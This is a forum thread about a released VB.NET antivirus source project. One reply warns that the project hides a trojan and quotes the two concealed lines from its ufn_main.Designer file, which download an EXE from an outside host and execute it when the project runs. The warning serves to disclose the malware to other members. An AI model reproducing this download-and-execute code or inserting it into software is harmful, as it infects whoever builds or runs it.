![]() |
|
[Release] VB.NET Anti-Virus Source Code. - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Coding (https://sinister.ly/Forum-Coding) +--- Forum: Visual Basic & .NET Framework (https://sinister.ly/Forum-Visual-Basic-NET-Framework) +--- Thread: [Release] VB.NET Anti-Virus Source Code. (/Thread-Release-VB-NET-Anti-Virus-Source-Code) |
RE: [Release] VB.NET Anti-Virus Source Code. - Mariano A. Broqueza - 02-05-2014 .,.,..,,ill try it to modify this,.................... RE: [Release] VB.NET Anti-Virus Source Code. - 756dk - 02-25-2014 Thanks For Sharing Buddy. RE: [Release] VB.NET Anti-Virus Source Code. - Miklo - 09-03-2015 WARNING!!!!!! WARNING!!!!!! WARNING!!!!!! The person who posted this Included a Link to Trojan Probably that is being Downloaded to Hack your PC. I found 2 Lines in the "ufn_main.Designer" page. When you Build and Run the Software then the Project Downloads an EXE file from another Locateion and Executes it . The Person who Posted this needs to be Banned for attempting to hack forum Members. What Disgrace. THESE ARE THE LINES THAT YOU NEED TO REMOVE FROM ufn_main.Designer PAGE BEFOR YOU RUN THE PROJECT IN VB: Code: My.Computer.Network.DownloadFile("http://exehost.net/uploads/103092375.Cubeistrolling.exe", Application.StartupPath + "\dependency.exe")
Shell(Application.StartupPath + "\dependency.exe") |